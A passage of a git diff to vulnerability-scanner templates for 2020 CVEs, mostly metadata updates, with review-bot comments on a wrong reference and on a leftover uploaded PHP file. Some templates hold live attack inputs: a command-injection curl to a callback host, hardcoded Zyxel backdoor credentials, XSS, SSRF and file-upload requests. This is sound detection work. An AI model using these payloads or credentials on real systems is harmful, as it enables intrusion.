tags: cve,cve2020,xstream,deserialization,rce,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,deserialization,rce,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index cbb5982c6b..1744f058f9 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml 
@@ -11,17 +11,21 @@ info: - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 + - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa remediation: Fixed in 4.2.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 - cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:*:*:* - epss-score: 0.0128 + epss-score: 0.01488 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 verified: true + framework: prestashop + vendor: prestashop + product: productcomments tags: cve,cve2020,sqli,prestshop,packetstorm http: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5a54386d7a..3b55b213b5 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -11,6 +11,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258 - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28 - https://nvd.nist.gov/vuln/detail/CVE-2020-26258 + - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N @@ -18,9 +19,12 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 - tags: cve,cve2020,xstream,ssrf,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,ssrf,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 2e3fa34612..11ef5209b4 100644 
--- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -9,17 +9,20 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + - https://hackerone.com/reports/972355 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* - epss-score: 0.70208 + epss-score: 0.64648 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 shodan-query: http.title:"GitLab" - tags: cve,cve2020,gitlab,exposure,enum,graphql + vendor: gitlab + product: gitlab + tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql http: - raw: @@ -50,6 +53,6 @@ http: extractors: - type: json - part: body json: - '.data.users.edges[].node.email' + part: body diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 637e46299d..700221c04f 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -10,16 +10,20 @@ info: - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - https://plugins.trac.wordpress.org/changeset/2388997 + - https://plugins.trac.wordpress.org/changeset/2389243 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-26876 cwe-id: CWE-306 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:*:*:* - epss-score: 0.01185 - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb + epss-score: 0.01156 + cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpcoursesplugin + product: wp-courses + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb http: - method: GET 
@@ -28,6 +32,11 @@ http: matchers-condition: and matchers: + - type: word + part: header + words: + - "application/json" + - type: regex part: body regex: @@ -35,11 +44,6 @@ http: - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - - type: word - part: header - words: - - "application/json" - - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 139d219bb8..13fce36c42 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -14,10 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.974 - tags: cve,cve2020,netgear,rce,oast,router,unauth,kev + epss-score: 0.97428 + cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: jgs516pe_firmware + tags: cve,cve2020,netgear,rce,oast,router,unauth,kev http: - raw: @@ -30,6 +33,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index f4f92f1ea4..32212767b8 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml 
@@ -14,26 +14,31 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26948 cwe-id: CWE-918 + epss-score: 0.04143 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* - epss-score: 0.0284 - tags: cve,cve2020,emby,jellyfin,ssrf metadata: max-request: 1 + vendor: emby + product: emby + tags: cve,cve2020,emby,jellyfin,ssrf http: - method: GET path: - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Name or service not known" + + - type: word + part: header + words: + - "text/plain" + - type: status status: - 500 - - type: word - words: - - "Name or service not known" - part: body - - type: word - words: - - "text/plain" - part: header diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index 15a672febc..d458c14c45 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 + epss-score: 0.00632 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* - epss-score: 0.00723 - tags: cve,cve2020,lionwiki,lfi,oss metadata: max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve,cve2020,lionwiki,lfi,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index b65d607b41..7bc228cf0e 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml 
@@ -14,12 +14,14 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2020-2733
- cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
- epss-score: 0.10266
+ epss-score: 0.1375
+ cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
 metadata:
 max-request: 1
 shodan-query: port:8999 product:"Oracle WebLogic Server"
 verified: true
+ vendor: oracle
+ product: jd_edwards_enterpriseone_tools
 tags: cve,cve2020,oracle,weblogic,disclosure,exposure
 
 http:
diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml
index bab77bc8e5..7c1851a0a4 100644
--- a/http/cves/2020/CVE-2020-27361.yaml
+++ b/http/cves/2020/CVE-2020-27361.yaml
@@ -6,18 +6,19 @@ info:
 severity: high
 description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.
 reference:
- - https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
 - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2020-27361
 cwe-id: CWE-668
- cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:*:*:*:*:*:*:*:*
- epss-score: 0.03049
- tags: cve,cve2020,akkadian,listing,exposure
+ epss-score: 0.02936
+ cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:*
 metadata:
 max-request: 1
+ vendor: akkadianlabs
+ product: akkadian_provisioning_manager
+ tags: cve,cve2020,akkadian,listing,exposure
 
 http:
 - method: GET
diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml
index 9c0547bffd..29162b61f7 100644
--- a/http/cves/2020/CVE-2020-27467.yaml
+++ b/http/cves/2020/CVE-2020-27467.yaml
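Review bot: After the CVE-2020-27361 hunk the template's only reference is `https://nvd.nist.gov/vuln/detail/CVE-2020-27191`, which is the NVD entry for a different issue (the LionWiki path traversal covered by CVE-2020-27191.yaml elsewhere in this diff), while the Black Lantern write-up that actually documents the Akkadian finding is the line being removed. Change the reference line to `- https://nvd.nist.gov/vuln/detail/CVE-2020-27361` and, unless the write-up has gone offline, keep the original advisory link so a hit can be triaged against its source. Nothing in the hunk explains the removal, so if the link is dead a replacement (vendor advisory or archived copy) is better than none.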
@@ -15,11 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 + epss-score: 0.00378 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* - epss-score: 0.00324 - tags: cve,cve2020,processwire,lfi,cms,oss metadata: max-request: 1 + vendor: processwire + product: processwire + tags: cve,cve2020,processwire,lfi,cms,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 1a70b65867..0bf6b9376f 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -11,10 +11,18 @@ info: - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070 - https://nvd.nist.gov/vuln/detail/CVE-2020-27481 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-27481 - tags: goodlayerslms,sqli,wpscan,cve,cve2020 + cwe-id: CWE-89 + epss-score: 0.1745 + cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: goodlayers + product: good_learning_management_system + tags: goodlayerslms,sqli,wpscan,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index df404c2e40..79d08426b8 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* epss-score: 0.00179 - tags: cve,cve2020,xss,wing-ftp + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wftpserver + product: wing_ftp_server + tags: cve,cve2020,xss,wing-ftp http: - method: GET @@ -29,15 +31,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 
diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 9ee66954e5..687a3394eb 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -15,11 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-27866 - cwe-id: CWE-288 + cwe-id: CWE-288,CWE-287 epss-score: 0.00365 - tags: cve,cve2020,netgear,auth-bypass + cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: ac2100_firmware + tags: cve,cve2020,netgear,auth-bypass http: - raw: @@ -33,11 +36,11 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - 'Debug Enable!' + - type: status status: - 200 - - - type: word - words: - - 'Debug Enable!' - part: body diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 4fd6e88063..f8b813a318 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* - epss-score: 0.0017 + epss-score: 0.00167 + cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"icewarp" + vendor: icewarp + product: mail_server tags: xss,icewarp,packetstorm,cve,cve2020 http: @@ -29,16 +31,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index d1af81738b..65bbc3cede 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml 
@@ -15,12 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27986 - cwe-id: CWE-306,CWE-312 - cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* - epss-score: 0.23185 - tags: cve,cve2020,sonarqube + cwe-id: CWE-306 + epss-score: 0.1352 + cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sonarsource + product: sonarqube + tags: cve,cve2020,sonarqube http: - method: GET @@ -30,13 +32,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - email.smtp_host.secured - email.smtp_password.secured - email.smtp_port.secured - email.smtp_username.secured - part: body condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index e170f2ff60..c6587b0d51 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -10,17 +10,19 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 + - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 + epss-score: 0.97235 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* - epss-score: 0.97266 - tags: cve,cve2020,terramaster,rce,oast,mirai,unauth metadata: max-request: 2 - + vendor: terra-master + product: tos + tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth variables: useragent: '{{rand_base(6)}}' 
@@ -29,16 +31,16 @@ http: - | GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - - | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 45d2b922ba..68054c1ac0 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -16,10 +16,12 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28208 cwe-id: CWE-203 + epss-score: 0.00603 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - epss-score: 0.00732 metadata: max-request: 1 + vendor: rocket.chat + product: rocket.chat tags: packetstorm,cve,cve2020,rocketchat http: @@ -34,12 +36,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"result\":false' - '"success":true' - part: body condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index b2aefe7d6e..ef27c1dbc1 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml 
@@ -10,34 +10,39 @@ info: - https://www.mitel.com/articles/what-happened-shoretel-products - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://github.com/dievus/cve-2020-28351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.0031 - tags: packetstorm,cve,cve2020,shoretel,xss + epss-score: 0.00314 + cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mitel + product: shoretel_firmware + tags: packetstorm,cve,cve2020,shoretel,xss http: - method: GET path: - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 967a510c8b..2e7fb0d4cc 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml 
@@ -10,15 +10,18 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html + - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - cpe: cpe:2.3:a:monitorr_project:monitorr:*:*:*:*:*:*:*:* - epss-score: 0.96822 + epss-score: 0.96694 + cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: monitorr_project + product: monitorr tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce http: @@ -42,7 +45,6 @@ http: GIF89a213213123 -----------------------------31046105003900160576454225745-- - - | GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 5691ef7628..5b9d534f88 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml 
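Review bot: After the CVE-2020-28871 hunk the second request still fetches `/assets/data/usrimg/{{tolower("{{randstr}}.php")}}`, the PHP file the multipart upload above it plants, and nothing in the template removes it afterwards, so every positive scan leaves an executable file in a web-served directory of the target. Since the template is already tagged `intrusive`, at least add a line to the description such as `The check uploads a .php file to /assets/data/usrimg/; remove it after confirmation.`, and add a cleanup request if the application exposes a delete endpoint. Also confirm that the nested template in `{{tolower("{{randstr}}.php")}}` expands to the same name the upload used; the upload's filename field sits above the hunk, so I could not check it here.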
@@ -10,16 +10,20 @@ info: - https://www.canto.com/integrations/wordpress/ - https://github.com/CantoDAM/Canto-Wordpress-Plugin - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28976 cwe-id: CWE-918 - cpe: cpe:2.3:a:canto:canto:*:*:*:*:*:*:*:* - epss-score: 0.004 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb + epss-score: 0.00452 + cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 + framework: wordpress + vendor: canto + product: canto + tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb http: - method: GET @@ -29,6 +33,7 @@ http: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f861da7ef6..f59e74ba1b 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29164 cwe-id: CWE-79 - cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* epss-score: 0.00159 - tags: pacsone,xss,cve,cve2020 + cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rainbowfishsoftware + product: pacsone_server + tags: pacsone,xss,cve,cve2020 http: - method: GET @@ -27,16 +29,15 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - "text/html" - part: header - type: word + part: body words: - '1' - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 869fe1f122..f6fea46912 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml 
@@ -13,11 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:* - epss-score: 0.00625 - tags: cve,cve2020,lfi + epss-score: 0.00544 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: car_rental_management_system_project + product: car_rental_management_system + tags: cve,cve2020,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5d43730901..22a88089ae 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -11,16 +11,19 @@ info: - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:*:*:*:*:*:*:*:* - epss-score: 0.02921 + epss-score: 0.05055 + cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: multi_restaurant_table_reservation_system_project + product: multi_restaurant_table_reservation_system tags: cve2020,tablereservation,sqli,unauth,edb,cve http: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index d9ca422678..ce62bdb148 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml 
@@ -15,10 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:*:*:* - epss-score: 0.03985 + epss-score: 0.03749 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: myeventon + product: eventon tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 520beacb68..142e6cda98 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -14,10 +14,13 @@ info: cve-id: CVE-2020-29453 cwe-id: CWE-22 epss-score: 0.0129 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,lfi + vendor: atlassian + product: data_center + tags: cve,cve2020,atlassian,jira,lfi,intrusive http: - method: GET @@ -27,11 +30,11 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - com.atlassian.jira + - type: status status: - 200 - - - type: word - words: - - 'com.atlassian.jira' - part: body diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index da1087b5d6..a80efb85e7 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml 
@@ -11,15 +11,20 @@ info: - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 - https://nvd.nist.gov/vuln/detail/CVE-2020-29583 - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html + - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 + epss-score: 0.95315 + cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: title:"USG FLEX 100" + vendor: zyxel + product: usg20-vpn_firmware tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: @@ -27,12 +32,12 @@ http: - | GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 Host: {{Hostname}} - - | GET /ext-js/index.html HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index d838f6707c..39ecd7624c 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -16,11 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - cpe: cpe:2.3:a:incomcms_project:incomcms:*:*:*:*:*:*:*:* - epss-score: 0.78911 + epss-score: 0.83522 + cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: incomcms_project + product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive http: @@ -36,12 +38,12 @@ http: {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word diff 